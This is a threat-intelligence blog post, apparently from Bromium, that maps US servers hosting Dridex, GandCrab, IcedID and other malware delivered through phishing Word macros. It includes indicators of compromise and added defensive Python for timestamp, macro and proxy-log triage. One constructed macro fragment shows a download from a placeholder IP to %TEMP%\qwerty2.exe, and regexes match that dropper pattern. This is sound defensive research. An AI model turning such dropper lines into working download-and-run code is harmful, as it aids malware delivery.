Mapping Out a Malware Distribution Network
- More than a dozen US-based web servers were used to host 10 malware families, distributed through mass phishing campaigns.
- Malware families include Dridex, GandCrab, Neutrino, IcedID and others.
- Evidence suggests the existence of distinct threat actors: one responsible for email and malware hosting, and others that operate the malware.
- Indications that the servers are part of Necurs botnet malware-hosting infrastructure.
A Bromium review of threat data from May 2018 to March 2019 has documented a collection of web servers located in the United States that are being used to distribute 10 major malware families in large-scale malicious spam campaigns.
The malware hosted on the infrastructure includes five families of banking Trojans, two families of ransomware, and three information stealers. Multiple malware families were staged on the same web servers and subsequently distributed through mass phishing campaigns. The reuse of the servers to host different malware indicates the involvement of a common entity in the activities of the different malware operators. The variety of malware families hosted, and the apparent separation of command and control (C2) from email and hosting infrastructure, suggests the existence of distinct threat actors: one responsible for email and hosting, and others in charge of operating the malware.
In each of the campaigns, email was the attack vector. The phishing emails delivered Microsoft Word documents and used social engineering to trick victims into running malicious VBA macros that would download the malware. Significantly, the web servers we identified belong to a single autonomous system, AS53667, registered under the netname PONYNET, which contains 52,992 IP addresses. The hosting provider that owns PONYNET is a company called FranTech Solutions, a so-called “bulletproof host”. BuyVM is another company owned by FranTech that sells virtual private server (VPS) hosting services. One of the data centres used by BuyVM is in Nevada, US, which is where 11 of the web servers were hosted.
Malware Hosted on US Soil
It was interesting to us that the hosting infrastructure is located in the United States and not in a jurisdiction that is known to be uncooperative with law enforcement. One possible reason for choosing a US hosting provider is so that the HTTP connections to download the malware from the web servers are more likely to succeed inside organisations that block traffic to and from countries that fall outside of their typical profile of network traffic.
There is evidence to suggest that the malware identified primarily targets an anglophone audience because all the phishing emails and documents we examined from campaigns linked to the hosting infrastructure were written in English. Moreover, several of the lures used were only relevant to a US audience. For example, in March 2019 GandCrab ransomware hosted on one of the web servers was distributed through phishing emails that purported to be from the Centers for Disease Control and Prevention (CDC), a US government federal agency.
The servers identified run similar software builds, namely default installations of CentOS and Apache HTTP Server versions 2.4.6 or 2.2.15. The malicious executables were nearly always hosted in the root directory of the web servers. We found no evidence that the web servers ever hosted legitimate content, which suggests that they were provisioned to host malware.
Figure 1 – The default Apache installation web page had not been changed on the servers.
The naming convention of the malicious files often revealed the family of the malware or its intended purpose. For example, in a campaign in September 2018 we saw a Neutrino (also known as Kasidet) sample named ‘cc.exe’ being hosted. Neutrino is an information stealer known for exfiltrating credit card data from point of sale (POS) systems, perhaps explaining why it was given this filename.
| Filename Observed | Malware Family |
|---|---|
| cc.exe | Neutrino (Kasidet) |
When we examined the samples hosted on the web servers, we noticed that the time difference between when they were compiled and when they were first observed being hosted was less than 24 hours, and in some cases only a matter of hours. The quick turnaround from compilation to hosting suggests an organised relationship between malware developers and the operators of the distribution infrastructure.
| SHA256 | Compile Time | First Observed Hosted Time |
|---|---|---|
| 125F787817B611F330AE77C773014C560A1051D26F958B01FABD7DFCEF10FC42 | 2019-03-13 06:01 | 2019-03-13 10:53 |
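The compile-to-hosting lag above is easy to compute at scale from the COFF file header, which is where Windows stores a PE image's build timestamp. The following is an added example, not code from the original post: it reads the TimeDateStamp from a PE image, compares it with the time the sample was first seen on a distribution server, and flags the sub-24-hour turnaround described above (and a timestamp that lies in the future, which is a separate sign of tampering). The stub PE header it builds for the demonstration is constructed for illustration and is not a real binary; the table gives no timezone, so UTC is assumed here.

```python
import struct
from datetime import datetime, timedelta, timezone

# Threshold taken from the observation in the text: compile-to-hosting lag under 24 hours
FAST_TURNAROUND = timedelta(hours=24)


def pe_compile_time(data: bytes) -> datetime:
    """Read the COFF TimeDateStamp of a PE image and return it as a UTC datetime."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew (offset 0x3C of the DOS header) points at the 'PE\0\0' signature
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # The COFF file header follows the 4-byte signature; TimeDateStamp is its third field
    # (after Machine and NumberOfSections), i.e. 4 bytes into the header
    timestamp = struct.unpack_from("<I", data, e_lfanew + 8)[0]
    return datetime.fromtimestamp(timestamp, tz=timezone.utc)


def hosting_lag(data: bytes, first_seen_hosted: datetime) -> timedelta:
    """Time between compilation and first observation on a distribution server."""
    return first_seen_hosted - pe_compile_time(data)


def triage(sha256: str, data: bytes, first_seen_hosted: datetime) -> dict:
    """Summarise the sample for an analyst: lag in hours and the two flags of interest."""
    lag = hosting_lag(data, first_seen_hosted)
    return {
        "sha256": sha256,
        "compiled": pe_compile_time(data).isoformat(),
        "lag_hours": round(lag.total_seconds() / 3600, 2),
        "fast_turnaround": timedelta(0) <= lag < FAST_TURNAROUND,
        # A negative lag means the build stamp post-dates the sighting: a forged timestamp
        "timestamp_in_future": lag < timedelta(0),
    }


def build_stub_pe(compile_time: datetime) -> bytes:
    """Constructed MZ/PE header stub (not a real, loadable binary) carrying a timestamp."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS stub
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 0, int(compile_time.timestamp()), 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff


# Values from the table above; the timezone is not stated there and is assumed to be UTC
SAMPLE_SHA256 = "125F787817B611F330AE77C773014C560A1051D26F958B01FABD7DFCEF10FC42"
SAMPLE_COMPILED = datetime(2019, 3, 13, 6, 1, tzinfo=timezone.utc)
SAMPLE_FIRST_SEEN = datetime(2019, 3, 13, 10, 53, tzinfo=timezone.utc)
SAMPLE_PE = build_stub_pe(SAMPLE_COMPILED)

if __name__ == "__main__":
    print(triage(SAMPLE_SHA256, SAMPLE_PE, SAMPLE_FIRST_SEEN))
```

On a real sample, replace `SAMPLE_PE` with the file's bytes; the first-seen time comes from whatever telemetry recorded the download (proxy logs, sandbox submission time, or a threat-intel feed).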
We identified similarities across the malicious spam campaigns delivering the different malware families hosted on the web servers. Nearly all of the campaigns delivered phishing emails with Microsoft Word documents that contained malicious VBA macros. In several campaigns, the phishing emails contained a hyperlink to a domain that pointed to one of the malware distribution servers. Analysis of the macros in the Word droppers found that they all contained a hard-coded IP address of the web server hosting the second-stage malware, rather than a domain name. Additionally, all the macros saved the resulting executable to a file named ‘qwerty2.exe’, which was then run from the user’s temporary directory. 63% of the campaigns delivered a weaponised Word document that was password protected, with a simple password in the message body of the email, such as ‘1234’ or ‘321’.
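The three macro traits described above (an IP-literal download URL, the fixed drop name ‘qwerty2.exe’, and the user’s temporary directory as the drop location) are cheap to check once the VBA source has been extracted from a document, for example with a tool such as olevba. The following is an added example, not code from the original post: it runs those checks over macro text and returns the extracted indicators with a simple verdict. The two macro fragments it is run against are constructed for the demonstration (the IP address 192.0.2.10 is a documentation-range placeholder, not an indicator from the campaigns).

```python
import re

# One pattern per trait described in the text
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(/[^\s\"']*)?", re.I)
DROP_NAME = re.compile(r"qwerty2\.exe", re.I)
TEMP_DIR = re.compile(r"Environ\s*\(\s*\"TEMP\"\s*\)|%TEMP%", re.I)


def triage_macro(vba_source: str) -> dict:
    """Score extracted VBA text against the dropper traits and pull out the indicators."""
    matches = list(IP_URL.finditer(vba_source))
    urls = sorted({m.group(0) for m in matches})
    ips = sorted({m.group(1) for m in matches})
    drops_qwerty2 = bool(DROP_NAME.search(vba_source))
    writes_to_temp = bool(TEMP_DIR.search(vba_source))

    # Each trait counts once; hard-coded IP URLs are the strongest single signal
    score = (2 if ips else 0) + int(drops_qwerty2) + int(writes_to_temp)
    return {
        "urls": urls,
        "ips": ips,
        "drops_qwerty2": drops_qwerty2,
        "writes_to_temp": writes_to_temp,
        "score": score,
        "verdict": "suspicious" if score >= 2 else "no dropper traits",
    }


# Constructed macro fragment showing the traits; it fetches nothing and is not a working dropper
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim url As String, target As String
    url = "http://192.0.2.10/cc.exe"
    target = Environ("TEMP") & "\qwerty2.exe"
    Call Fetch(url, target)
End Sub
'''

# Constructed benign macro for comparison
BENIGN_MACRO = r'''
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, source in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, triage_macro(source))
```

The extracted IPs feed straight into the hunting step that follows: any proxy or firewall log entry for a connection to one of them is worth pulling, whether or not the download succeeded.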
Figure 2 – Most frequently encountered weaponised document type.
We also noticed the reoccurrence of lures across the campaigns. The most popular lure was a job application narrative (42%) containing a resume to be reviewed, followed by emails posing as unpaid invoices (21%).
Shared Malware Hosting Infrastructure
We identified several cases where multiple malware families were hosted on the same server. In some cases, two malware families were used in conjunction with each other, where one would act as a dropper for the other. We saw this pairing behaviour in phishing campaigns in July and August 2018 that delivered AZORult, an information stealer that was used to download Hermes ransomware. In those campaigns, both types of malware were hosted on the same server.
Figure 3 – Dridex and IcedID shared distribution infrastructure.
The other pattern we saw is where the servers were reused to host malware for different campaigns. On 5 March 2019, we saw a malicious spam campaign that ultimately delivered IcedID, a banking Trojan. The following week on 13 March, we observed the same server being reused to host Dridex, a different family of banking Trojan. In another case, we saw a single web server being used to host six different malware families in campaigns over 40 days in 2018.
Links to Necurs Botnet and Signs of a Possible Dridex Resurgence
In March 2019, we noticed that one of the web servers was used to host a recent sample of Dridex. Seeing Dridex on this infrastructure was interesting to us for two reasons. The gang operating Dridex has been using the Necurs botnet as a vehicle for spreading their malware through malicious spam campaigns since 2016. Given the similarities between the campaigns delivering Dridex and the other malware families we identified, it is possible that this collection of web servers is part of the malware hosting and distribution infrastructure used by the operators of the Necurs botnet. All the hosted malware we examined has been linked to high-volume malicious spam campaigns that are consistent with the tactics, techniques and procedures (TTPs) and distribution-as-a-service business model of the Necurs botnet.
The second reason why this caught our attention is that, unlike the other campaigns, the web server enforced HTTP basic authentication as a means of preventing the executable from being downloaded without a correct username and password. It is likely that this was implemented to impede investigations by network defenders and researchers, because analysis of the payload requires access to the Word dropper or to sources of network traffic containing the HTTP request, such as proxy logs or full packet capture. The username and password pair in that campaign was ‘username’ and ‘password’, and the name of the delivered file was ‘test1.exe’, suggesting that this may have been a trial campaign. Given the relative lull in Dridex activity for several months, this may be an indication of preparation for larger Dridex campaigns to come, or of the adoption of HTTP basic authentication in other campaigns.
Figure 4 – VBA code from Word dropper delivering Dridex using HTTP basic authentication in March 2019.
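Because the basic-auth credentials travel in the request, proxy logs that record request headers are enough to both detect the download and recover the credentials an analyst needs to fetch the payload for examination. The following is an added example, not code from the original post: it scans proxy log entries for the hosting traits described in this post (a bare IP as the HTTP host, an executable served from the web root, a default CentOS Apache 2.4.6 or 2.2.15 banner) plus a Basic Authorization header, and decodes that header. The JSON-lines log format and its field names are an assumption for the demonstration, and the three log lines are constructed; the 192.0.2.0/24 and 203.0.113.0/24 addresses are documentation-range placeholders, not indicators from the campaigns. The ‘username’/‘password’ pair is the one reported above.

```python
import base64
import ipaddress
import json
import re
from typing import Optional, Tuple

# Server banners the text associates with the distribution hosts (default CentOS builds)
APACHE_BUILDS = ("Apache/2.4.6", "Apache/2.2.15")
# An .exe sitting directly under the web root, as observed on these servers
ROOT_EXE = re.compile(r"^/[^/]+\.exe$", re.I)
# Minimum number of traits before an entry is reported
REPORT_THRESHOLD = 2


def is_ip_literal(host: str) -> bool:
    """True when the Host value is a bare IP address rather than a domain name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def decode_basic_auth(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Return (user, password) from an 'Authorization: Basic ...' value, else None."""
    if not header:
        return None
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, password = raw.partition(":")
    return user, password


def assess(entry: dict) -> list:
    """List the distribution-server traits a single proxy log entry exhibits."""
    reasons = []
    if is_ip_literal(entry.get("host", "")):
        reasons.append("host is a bare IP literal")
    if ROOT_EXE.match(entry.get("path", "")):
        reasons.append("executable served from the web root")
    if any(entry.get("server", "").startswith(b) for b in APACHE_BUILDS):
        reasons.append("default CentOS Apache build banner")
    if decode_basic_auth(entry.get("authorization")):
        reasons.append("HTTP basic authentication on the download")
    return reasons


def scan(log_text: str) -> list:
    """Parse JSON-lines proxy records and report entries meeting the threshold."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        reasons = assess(entry)
        if len(reasons) >= REPORT_THRESHOLD:
            creds = decode_basic_auth(entry.get("authorization"))
            findings.append({
                "ts": entry.get("ts"),
                "client": entry.get("client"),
                "host": entry.get("host"),
                "path": entry.get("path"),
                "reasons": reasons,
                # Recovered so an analyst can retrieve the payload; never reuse elsewhere
                "basic_auth_user": creds[0] if creds else None,
            })
    return findings


# Constructed proxy log (JSON lines); the layout is assumed, not a real product's format
SAMPLE_LOG = """
{"ts": "2019-03-13T10:53:02Z", "client": "10.0.0.15", "method": "GET", "host": "www.example.com", "path": "/index.html", "status": 200, "server": "nginx"}
{"ts": "2019-03-13T10:53:40Z", "client": "10.0.0.15", "method": "GET", "host": "192.0.2.10", "path": "/test1.exe", "status": 200, "server": "Apache/2.4.6 (CentOS)", "authorization": "Basic dXNlcm5hbWU6cGFzc3dvcmQ="}
{"ts": "2019-03-13T11:02:11Z", "client": "10.0.0.22", "method": "GET", "host": "203.0.113.5", "path": "/cc.exe", "status": 200, "server": "Apache/2.2.15 (CentOS)"}
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

With full packet capture the same Authorization header can be read from the reassembled HTTP stream; the decoder above works on the header value regardless of where it was captured.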
Malware Families Hosted
We identified 10 malware families being distributed through this hosting infrastructure, listed below.
| Malware Family | Type |
|---|---|
| AZORult | Information stealer (used as a dropper) |
| Dridex | Banking Trojan |
| GandCrab | Ransomware |
| Hermes | Ransomware |
| IcedID | Banking Trojan |
| Neutrino (Kasidet) | Information stealer |
Email is the favoured attack vector for the malware families we identified in this research. This speaks to the enduring effectiveness of phishing campaigns at convincing users to open malicious documents and hyperlinks. Computers that are running Bromium Secure Platform are protected from these attacks because every Office document and website is opened in an isolated micro-virtual machine. Should a vulnerability be exploited, or malware downloaded by a macro, it has zero impact on the confidentiality, integrity and availability of the data held on the machine. All of the threat data associated with the attack is recorded and presented in the Bromium Controller, enabling SOC and incident response teams to gain detailed insights into the threats facing their organisations quickly.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| File Path | %TEMP%\qwerty2.exe | Malicious executable path |
| IP Address | (not preserved in this copy of the post) | Web server used for malware distribution |
| SHA256 | 125F787817B611F330AE77C773014C560A1051D26F958B01FABD7DFCEF10FC42 | Hosted malicious files |